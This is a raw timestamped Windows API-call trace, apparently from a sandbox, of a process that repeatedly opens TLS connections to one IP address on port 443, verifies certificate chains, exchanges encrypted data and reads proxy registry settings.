	[0500.520] CertEnumCertificatesInStore (hCertStore=0x233fc6820a0, pPrevCertContext=0x233fc6804b0) returned 0x0
	[0500.520] CertCloseStore (hCertStore=0x233fc6820a0, dwFlags=0x0) returned 1
	[0500.521] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0500.522] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682170
	[0500.522] CertAddCRLLinkToStore (in: hCertStore=0x233fc682170, pCrlContext=0x233fc6804b0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0500.522] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc6804b0, pTime=0x350199b4c8, hAdditionalStore=0x233fc682170, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0500.523] CertDuplicateCertificateChain (pChainContext=0x233fc6fec90) returned 0x233fc6fec90
	[0500.525] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0500.525] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0500.526] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0500.527] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0500.527] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0500.527] SetLastError (dwErrCode=0x0) 
	[0500.527] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fec90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0500.527] CertFreeCertificateChain (pChainContext=0x233fc6fec90) 
	[0500.528] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0500.529] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48db9b0, MessageSeqNo=0x0 | out: pMessage=0x233e48db9b0) returned 0x0
	[0500.529] CoTaskMemAlloc (cb=0x20) returned 0x233fc650230
	[0500.529] WSASend (in: s=0x7cc, lpBuffers=0x233fc650230*=((len=0x3b, buf=0x233e48d8c70*), (len=0xd5, buf=0x233e48db7b8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650230*=((len=0x3b, buf=0x233e48d8c70*), (len=0xd5, buf=0x233e48db7b8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0500.530] CoTaskMemFree (pv=0x233fc650230) 
	[0500.530] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0500.531] recv (in: s=0x7cc, buf=0x233e48dbb58, len=5, flags=0 | out: buf=0x233e48dbb58*) returned 5
	[0501.054] recv (in: s=0x7cc, buf=0x233e48dbb7d, len=1488, flags=0 | out: buf=0x233e48dbb7d*) returned 1488
	[0501.054] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48dc260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48dc260, pfQOP=0x0) returned 0x0
	[0501.054] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0501.054] SetEvent (hEvent=0x6b4) returned 1
	[0501.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0521.084] CloseHandle (hObject=0x25c) returned 1
	[0521.363] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0521.363] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0521.364] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0521.364] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0521.366] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0521.367] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0521.367] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0521.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0521.369] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0521.370] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0521.370] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0521.371] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc688ec0
	[0521.371] WinHttpSetTimeouts (hInternet=0x233fc688ec0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0521.371] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0521.392] SetEvent (hEvent=0x6b4) returned 1
	[0521.392] select (in: nfds=0, readfds=0x233e48e3c58, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48e3c58, writefds=0x0, exceptfds=0x0) returned 1
	[0521.393] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0521.395] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0521.398] shutdown (s=0x7cc, how=2) returned 0
	[0521.399] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0521.400] closesocket (s=0x7cc) returned 0
	[0521.401] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0521.402] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0521.402] WSAConnect (in: s=0x7cc, name=0x233e48e53f0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0521.511] closesocket (s=0x9bc) returned 0
	[0521.512] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48e2398, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48e5c78, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48e5c78, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0521.513] FreeContextBuffer (in: pvContextBuffer=0x233fc687fd0 | out: pvContextBuffer=0x233fc687fd0) returned 0x0
	[0521.513] send (in: s=0x7cc, buf=0x233e48e5d48*, len=333, flags=0 | out: buf=0x233e48e5d48*) returned 333
	[0521.514] recv (in: s=0x7cc, buf=0x233e48e5d48, len=5, flags=0 | out: buf=0x233e48e5d48*) returned 5
	[0521.620] recv (in: s=0x7cc, buf=0x233e48e5d4d, len=49, flags=0 | out: buf=0x233e48e5d4d*) returned 49
	[0521.620] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48e2398, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48e5f88, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48e5fa8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48e5fa8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0521.620] recv (in: s=0x7cc, buf=0x233e48e6098, len=5, flags=0 | out: buf=0x233e48e6098*) returned 5
	[0521.620] recv (in: s=0x7cc, buf=0x233e48e60bd, len=1, flags=0 | out: buf=0x233e48e60bd*) returned 1
	[0521.621] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48e2398, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48e6190, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48e61b0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48e61b0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0521.621] recv (in: s=0x7cc, buf=0x233e48e62a0, len=5, flags=0 | out: buf=0x233e48e62a0*) returned 5
	[0521.621] recv (in: s=0x7cc, buf=0x233e48e62c5, len=48, flags=0 | out: buf=0x233e48e62c5*) returned 48
	[0521.622] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48e2398, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48e63c8, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48e63e8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48e63e8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0521.623] FreeContextBuffer (in: pvContextBuffer=0x233e399c1c0 | out: pvContextBuffer=0x233e399c1c0) returned 0x0
	[0521.623] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48e6530 | out: pBuffer=0x233e48e6530) returned 0x0
	[0521.623] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48e6588 | out: pBuffer=0x233e48e6588) returned 0x0
	[0521.624] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48e65f0 | out: pBuffer=0x233e48e65f0) returned 0x0
	[0521.624] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0521.625] CertDuplicateStore (hCertStore=0x233fc682310) returned 0x233fc682310
	[0521.625] CertEnumCertificatesInStore (hCertStore=0x233fc682310, pPrevCertContext=0x0) returned 0x233fc67f430
	[0521.625] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0521.625] CertEnumCertificatesInStore (hCertStore=0x233fc682310, pPrevCertContext=0x233fc67f430) returned 0x0
	[0521.625] CertCloseStore (hCertStore=0x233fc682310, dwFlags=0x0) returned 1
	[0521.626] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0521.627] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6824b0
	[0521.627] CertAddCRLLinkToStore (in: hCertStore=0x233fc6824b0, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0521.628] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc6824b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0521.630] CertDuplicateCertificateChain (pChainContext=0x233fc6fee10) returned 0x233fc6fee10
	[0521.631] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0521.632] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0521.633] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0521.633] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0521.633] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0521.633] SetLastError (dwErrCode=0x0) 
	[0521.633] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0521.634] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0521.635] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0521.635] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48e91f8, MessageSeqNo=0x0 | out: pMessage=0x233e48e91f8) returned 0x0
	[0521.636] CoTaskMemAlloc (cb=0x20) returned 0x233fc6502f0
	[0521.636] WSASend (in: s=0x7cc, lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e48e64b8*), (len=0xd5, buf=0x233e48e9000*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e48e64b8*), (len=0xd5, buf=0x233e48e9000*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0521.636] CoTaskMemFree (pv=0x233fc6502f0) 
	[0521.636] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0521.636] recv (in: s=0x7cc, buf=0x233e48e93a0, len=5, flags=0 | out: buf=0x233e48e93a0*) returned 5
	[0522.127] recv (in: s=0x7cc, buf=0x233e48e93c5, len=1488, flags=0 | out: buf=0x233e48e93c5*) returned 1488
	[0522.127] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48e9aa8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48e9aa8, pfQOP=0x0) returned 0x0
	[0522.127] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0522.128] SetEvent (hEvent=0x6b4) returned 1
	[0522.157] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0527.161] CloseHandle (hObject=0x25c) returned 1
	[0527.390] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0527.391] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0527.392] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0527.392] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0527.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0527.393] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0527.393] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0527.395] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0527.395] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0527.395] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0527.395] GetCurrentProcess () returned 0xffffffffffffffff
	[0527.395] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0527.396] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689da0
	[0527.397] WinHttpSetTimeouts (hInternet=0x233fc689da0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0527.397] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0527.414] SetEvent (hEvent=0x6b4) returned 1
	[0527.415] select (in: nfds=0, readfds=0x233e48f1470, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48f1470, writefds=0x0, exceptfds=0x0) returned 1
	[0527.415] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0527.416] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0527.417] shutdown (s=0x7cc, how=2) returned 0
	[0527.427] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0527.427] closesocket (s=0x7cc) returned 0
	[0527.429] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0527.429] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0527.429] WSAConnect (in: s=0x7cc, name=0x233e48f2c38*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0527.537] closesocket (s=0x9bc) returned 0
	[0527.538] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48efbe0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48f34c0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48f34c0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0527.540] FreeContextBuffer (in: pvContextBuffer=0x233fc686760 | out: pvContextBuffer=0x233fc686760) returned 0x0
	[0527.540] send (in: s=0x7cc, buf=0x233e48f3590*, len=333, flags=0 | out: buf=0x233e48f3590*) returned 333
	[0527.540] recv (in: s=0x7cc, buf=0x233e48f3590, len=5, flags=0 | out: buf=0x233e48f3590*) returned 5
	[0527.656] recv (in: s=0x7cc, buf=0x233e48f3595, len=49, flags=0 | out: buf=0x233e48f3595*) returned 49
	[0527.656] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48efbe0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48f37d0, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48f37f0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48f37f0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0527.657] recv (in: s=0x7cc, buf=0x233e48f38e0, len=5, flags=0 | out: buf=0x233e48f38e0*) returned 5
	[0527.657] recv (in: s=0x7cc, buf=0x233e48f3905, len=1, flags=0 | out: buf=0x233e48f3905*) returned 1
	[0527.657] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48efbe0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48f39d8, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48f39f8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48f39f8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0527.658] recv (in: s=0x7cc, buf=0x233e48f3ae8, len=5, flags=0 | out: buf=0x233e48f3ae8*) returned 5
	[0527.658] recv (in: s=0x7cc, buf=0x233e48f3b0d, len=48, flags=0 | out: buf=0x233e48f3b0d*) returned 48
	[0527.658] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48efbe0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48f3c10, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48f3c30, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48f3c30, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0527.662] FreeContextBuffer (in: pvContextBuffer=0x233e399c8e0 | out: pvContextBuffer=0x233e399c8e0) returned 0x0
	[0527.662] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48f3d78 | out: pBuffer=0x233e48f3d78) returned 0x0
	[0527.662] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48f3dd0 | out: pBuffer=0x233e48f3dd0) returned 0x0
	[0527.663] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48f3e38 | out: pBuffer=0x233e48f3e38) returned 0x0
	[0527.663] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0527.664] CertDuplicateStore (hCertStore=0x233fc6834f0) returned 0x233fc6834f0
	[0527.664] CertEnumCertificatesInStore (hCertStore=0x233fc6834f0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0527.665] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0527.665] CertEnumCertificatesInStore (hCertStore=0x233fc6834f0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0527.665] CertCloseStore (hCertStore=0x233fc6834f0, dwFlags=0x0) returned 1
	[0527.665] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0527.668] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683280
	[0527.668] CertAddCRLLinkToStore (in: hCertStore=0x233fc683280, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0527.668] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683280, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0527.670] CertDuplicateCertificateChain (pChainContext=0x233fc6feb10) returned 0x233fc6feb10
	[0527.671] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0527.672] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0527.673] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0527.673] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0527.673] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0527.673] SetLastError (dwErrCode=0x0) 
	[0527.673] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0527.674] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0527.674] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0527.675] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48f6a40, MessageSeqNo=0x0 | out: pMessage=0x233e48f6a40) returned 0x0
	[0527.675] CoTaskMemAlloc (cb=0x20) returned 0x233fc650230
	[0527.675] WSASend (in: s=0x7cc, lpBuffers=0x233fc650230*=((len=0x3b, buf=0x233e48f3d00*), (len=0xd5, buf=0x233e48f6848*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650230*=((len=0x3b, buf=0x233e48f3d00*), (len=0xd5, buf=0x233e48f6848*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0527.675] CoTaskMemFree (pv=0x233fc650230) 
	[0527.675] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0527.676] recv (in: s=0x7cc, buf=0x233e48f6be8, len=5, flags=0 | out: buf=0x233e48f6be8*) returned 5
	[0528.203] recv (in: s=0x7cc, buf=0x233e48f6c0d, len=1488, flags=0 | out: buf=0x233e48f6c0d*) returned 1488
	[0528.203] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48f72f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48f72f0, pfQOP=0x0) returned 0x0
	[0528.222] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0528.223] SetEvent (hEvent=0x6b4) returned 1
	[0528.277] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0546.281] CloseHandle (hObject=0x25c) returned 1
	[0546.667] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0546.667] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0546.667] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0546.668] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0546.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0546.669] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0546.669] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0546.670] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0546.671] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0546.671] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0546.671] GetCurrentProcess () returned 0xffffffffffffffff
	[0546.671] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0546.672] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689520
	[0546.672] WinHttpSetTimeouts (hInternet=0x233fc689520, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0546.672] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0546.696] SetEvent (hEvent=0x6b4) returned 1
